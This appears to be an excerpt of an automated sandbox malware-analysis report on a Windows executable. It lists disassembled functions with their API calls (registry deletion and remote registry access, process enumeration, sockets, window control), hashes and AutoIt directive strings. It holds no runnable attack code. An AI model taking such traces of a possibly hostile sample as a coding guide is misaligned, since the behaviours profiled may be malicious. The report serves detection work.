                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00B13DA1
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B13DCB
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00B13E80
                                                                • Part of subcall function 00B13D72: RegCloseKey.ADVAPI32(?), ref: 00B13DE8
                                                                • Part of subcall function 00B13D72: FreeLibrary.KERNEL32(?), ref: 00B13E3A
                                                                • Part of subcall function 00B13D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B13E5D
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B13E25
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 7908d7c5139c5451202eb044dd40903c87cc108a11f9282e5f0393c8662b5cb0
                                                              • Instruction ID: 734e75e301cac13530f5f3d0c4adc25086428349e05c51727c071b42ca8dcc4a
                                                              • Opcode Fuzzy Hash: 7908d7c5139c5451202eb044dd40903c87cc108a11f9282e5f0393c8662b5cb0
                                                              • Instruction Fuzzy Hash: 3D31EDB2901209BFDB159B94EC85AFFB7FCEF08710F5001A9E512E2150EA749F859BB0
                                                              Function 00B18FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B18FE7
                                                              • GetWindowLongW.USER32(00C8D590,000000F0), ref: 00B1901A
                                                              • GetWindowLongW.USER32(00C8D590,000000F0), ref: 00B1904F
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B19081
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B190AB
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00B190BC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B190D6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 3bffe92c1db199ccba216efc65aaa3403ed9270e1faee3edb8dfc267614c0ce1
                                                              • Instruction ID: 738e6ee6d2467cbdcc73a34563a036d311996ed63a1eef921c4315df11c4944b
                                                              • Opcode Fuzzy Hash: 3bffe92c1db199ccba216efc65aaa3403ed9270e1faee3edb8dfc267614c0ce1
                                                              • Instruction Fuzzy Hash: BF313334640254EFDB218F58EC99FA837E5FB4A714F6401A8F5198B2B1CB72E880CF50
                                                              Function 00AF08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AF08F2
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AF0918
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00AF091B
                                                              • SysAllocString.OLEAUT32(?), ref: 00AF0939
                                                              • SysFreeString.OLEAUT32(?), ref: 00AF0942
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00AF0967
                                                              • SysAllocString.OLEAUT32(?), ref: 00AF0975
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: 2652302ad41d454abbf605aef7b18f228edad739ff13fb6ecf1578f813ed423a
                                                              • Instruction ID: a7b36a39399e5e27a421c0ad96a7162d56962645b9d3014121c9ae838af712f6
                                                              • Opcode Fuzzy Hash: 2652302ad41d454abbf605aef7b18f228edad739ff13fb6ecf1578f813ed423a
                                                              • Instruction Fuzzy Hash: F121797660121DAF9B109FB8DC84DBF77ECEB09360B508525FA15DB252EAB0EC45C7A0
                                                              Function 00AF2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                              • API String ID: 1038674560-2734436370
                                                              • Opcode ID: 72b5a9731019a07cf0f1fb2a6a7cea47bac78955d8d046c80a807f57bfdcab75
                                                              • Instruction ID: 90181263e5ecebc83979893427ba24d67279c4babbbc036062f4a708bafe54ed
                                                              • Opcode Fuzzy Hash: 72b5a9731019a07cf0f1fb2a6a7cea47bac78955d8d046c80a807f57bfdcab75
                                                              • Instruction Fuzzy Hash: 48216B3224421977D730EBB49D12FBB73E8EF65314F10803AF64797182E7999A42D3A5
                                                              Function 00AF0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AF09CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AF09F1
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00AF09F4
                                                              • SysAllocString.OLEAUT32 ref: 00AF0A15
                                                              • SysFreeString.OLEAUT32 ref: 00AF0A1E
                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00AF0A38
                                                              • SysAllocString.OLEAUT32(?), ref: 00AF0A46
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                              • String ID:
                                                              • API String ID: 3761583154-0
                                                              • Opcode ID: f9f942e28b0dc0c1668f25a3b4f2200332a4b93d0a891e72c0a6cb8e2e87165e
                                                              • Instruction ID: 7e3edfb4ca495ab233ca6b5a29a9c9a958d6995ac6d40e4305470cf708238ff8
                                                              • Opcode Fuzzy Hash: f9f942e28b0dc0c1668f25a3b4f2200332a4b93d0a891e72c0a6cb8e2e87165e
                                                              • Instruction Fuzzy Hash: 34215875604208AFDB10EFF8DC89DBA77EDEF093607508125FA19CB265EA70EC418754
                                                              Function 00B1A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ACD1BA
                                                                • Part of subcall function 00ACD17C: GetStockObject.GDI32(00000011), ref: 00ACD1CE
                                                                • Part of subcall function 00ACD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ACD1D8
                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B1A32D
                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B1A33A
                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B1A345
                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B1A354
                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B1A360
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                              • String ID: Msctls_Progress32
                                                              • API String ID: 1025951953-3636473452
                                                              • Opcode ID: a4596d3bdd7c299ed08ea9ea93a4429c838a38f5fa640909aa94400246ac349a
                                                              • Instruction ID: 7a0501868fa1134b5c0a2faa8574cfb93a1afb54458cdc17156446c784cc6928
                                                              • Opcode Fuzzy Hash: a4596d3bdd7c299ed08ea9ea93a4429c838a38f5fa640909aa94400246ac349a
                                                              • Instruction Fuzzy Hash: 9D11B6B1150119BEEF115FA4DC85EEB7F6DFF08798F014114FA18A60A0C772AC61DBA4
                                                              Function 00ACCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 00ACCCF6
                                                              • GetWindowRect.USER32(?,?), ref: 00ACCD37
                                                              • ScreenToClient.USER32(?,?), ref: 00ACCD5F
                                                              • GetClientRect.USER32(?,?), ref: 00ACCE8C
                                                              • GetWindowRect.USER32(?,?), ref: 00ACCEA5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Rect$Client$Window$Screen
                                                              • String ID:
                                                              • API String ID: 1296646539-0
                                                              • Opcode ID: b1f2f49333c5414f7cb8b0349b7f103e805c86a6188fcfabd5a7bfaa193c8c2a
                                                              • Instruction ID: b76916655703b52140fe82c2c0aa615ddec6bfeeeb8f95d9e651d63bec85e708
                                                              • Opcode Fuzzy Hash: b1f2f49333c5414f7cb8b0349b7f103e805c86a6188fcfabd5a7bfaa193c8c2a
                                                              • Instruction Fuzzy Hash: A7B15A79900249DBDF10CFA9C481BEEBBB1FF08310F159569EC69EB250DB30A951CB64
                                                              Function 00B11BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00B11C18
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00B11C26
                                                              • __wsplitpath.LIBCMT ref: 00B11C54
                                                                • Part of subcall function 00AD1DFC: __wsplitpath_helper.LIBCMT ref: 00AD1E3C
                                                              • _wcscat.LIBCMT ref: 00B11C69
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00B11CDF
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00B11CF1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID:
                                                              • API String ID: 1380811348-0
                                                              • Opcode ID: 7132ec059101f3b3775926f126982a21a02c94ccce60d34fcb9938163978138d
                                                              • Instruction ID: 72e2f0ab3aa70eeea3c80a037cce39ed2d5dba4b302979723fbf65030f77d384
                                                              • Opcode Fuzzy Hash: 7132ec059101f3b3775926f126982a21a02c94ccce60d34fcb9938163978138d
                                                              • Instruction Fuzzy Hash: AC515C715043409BD720EF24D985FABB7ECEF88754F00496EF58697292EB70DA44CB92
                                                              Function 00B12FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00B13C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B12BB5,?,?), ref: 00B13C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B130AF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B130EF
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B13112
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B1313B
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B1317E
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00B1318B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                              • String ID:
                                                              • API String ID: 3451389628-0
                                                              • Opcode ID: 9c74132370d35b093b57708e025934654fe88e486a9c09e1df0ddfaec17ceec2
                                                              • Instruction ID: 674b85265da0b18089d1ca24405a65cbee0390ed1ec0077f5742f28b83006d55
                                                              • Opcode Fuzzy Hash: 9c74132370d35b093b57708e025934654fe88e486a9c09e1df0ddfaec17ceec2
                                                              • Instruction Fuzzy Hash: 9D518631208300AFC704EF64CA95EAEBBE9FF88710F44485DF555972A2EB31EA45CB52
                                                              Function 00B184DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 00B18540
                                                              • GetMenuItemCount.USER32(00000000), ref: 00B18577
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B1859F
                                                              • GetMenuItemID.USER32(?,?), ref: 00B1860E
                                                              • GetSubMenu.USER32(?,?), ref: 00B1861C
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B1866D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: 6179f221f8121343a59803ed8740431e54e6d7f8d78e7c8bcf9c8c1c7de19615
                                                              • Instruction ID: b9f76828dec2d2fbb876788b5f017951bea655c9ef5b786d351b39c9bf17a50a
                                                              • Opcode Fuzzy Hash: 6179f221f8121343a59803ed8740431e54e6d7f8d78e7c8bcf9c8c1c7de19615
                                                              • Instruction Fuzzy Hash: F5518C75A00219AFCB11EFA4CA85AEEB7F5FF48310F154499E915BB351DF30AE818B90
                                                              Function 00AF4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AF4B10
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF4B5B
                                                              • IsMenu.USER32(00000000), ref: 00AF4B7B
                                                              • CreatePopupMenu.USER32 ref: 00AF4BAF
                                                              • GetMenuItemCount.USER32(000000FF), ref: 00AF4C0D
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AF4C3E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                              • String ID:
                                                              • API String ID: 3311875123-0
                                                              • Opcode ID: e8c72719d0c15fbc931e2f311896146e8c0c49f290c566f9c14c67f8e1936b65
                                                              • Instruction ID: 89b550095b25f90245421590efab204ab29bee93f300e38ad60ed3f0d34618f6
                                                              • Opcode Fuzzy Hash: e8c72719d0c15fbc931e2f311896146e8c0c49f290c566f9c14c67f8e1936b65
                                                              • Instruction Fuzzy Hash: 9851AD7060120DEBDF20CFA8D988BBFBBF4AF48318F144159F6659B291D7709945CB51
                                                              Function 00B08DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00B4DC00), ref: 00B08E7C
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B08E89
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00B08EAD
                                                              • #16.WSOCK32(?,?,00000000,00000000), ref: 00B08EC5
                                                              • _strlen.LIBCMT ref: 00B08EF7
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B08F6A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_strlenselect
                                                              • String ID:
                                                              • API String ID: 2217125717-0
                                                              • Opcode ID: 14ea0bf62613ff7de54605951f750f0488a304d30821be6d995a080c9062a925
                                                              • Instruction ID: 744799d0ddc4a48a611424a16bb7238ffd970dc72092afc924af5520f03f3325
                                                              • Opcode Fuzzy Hash: 14ea0bf62613ff7de54605951f750f0488a304d30821be6d995a080c9062a925
                                                              • Instruction Fuzzy Hash: 27418071500205ABCB14EBA4CE85EEEBBBDEF48310F104699F55A972D2DF30AE40CB60
                                                              Function 00ACABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • BeginPaint.USER32(?,?,?), ref: 00ACAC2A
                                                              • GetWindowRect.USER32(?,?), ref: 00ACAC8E
                                                              • ScreenToClient.USER32(?,?), ref: 00ACACAB
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00ACACBC
                                                              • EndPaint.USER32(?,?,?,?,?), ref: 00ACAD06
                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B2E673
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                              • String ID:
                                                              • API String ID: 2592858361-0
                                                              • Opcode ID: c28104dfd264f95a8b93137667c468804652612859a6595841b489460f8e71dc
                                                              • Instruction ID: 7a5183a21cbb1ca8bdbce1b72a3b7e7ef4c82763ac655e14c7e6517ae3cea0ca
                                                              • Opcode Fuzzy Hash: c28104dfd264f95a8b93137667c468804652612859a6595841b489460f8e71dc
                                                              • Instruction Fuzzy Hash: 3041AF701042049FC711DF69DC85FBA7BF8EB69724F14066DF9A9872A1CB319884DB62
                                                              Function 00B1E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(00B71628,00000000,00B71628,00000000,00000000,00B71628,?,00B2DC5D,00000000,?,00000000,00000000,00000000,?,00B2DAD1,00000004), ref: 00B1E40B
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00B1E42F
                                                              • ShowWindow.USER32(00B71628,00000000), ref: 00B1E48F
                                                              • ShowWindow.USER32(00000000,00000004), ref: 00B1E4A1
                                                              • EnableWindow.USER32(00000000,00000001), ref: 00B1E4C5
                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B1E4E8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 6e8c235094b40896a91d934db8264272d2d24ca9ba11c00a7db7fa0d54daa0f7
                                                              • Instruction ID: 0102a52d4cbb7196c6b3abfc0e9d49a75158e0bcf974c0a89de3653735e6412c
                                                              • Opcode Fuzzy Hash: 6e8c235094b40896a91d934db8264272d2d24ca9ba11c00a7db7fa0d54daa0f7
                                                              • Instruction Fuzzy Hash: 52410934601151EFDB26CF24D499BD87BE1FF09304F9841A9EE698F2A2C731E881DB91
                                                              Function 00AF98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00AF98D1
                                                                • Part of subcall function 00ACF4EA: std::exception::exception.LIBCMT ref: 00ACF51E
                                                                • Part of subcall function 00ACF4EA: __CxxThrowException@8.LIBCMT ref: 00ACF533
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00AF9908
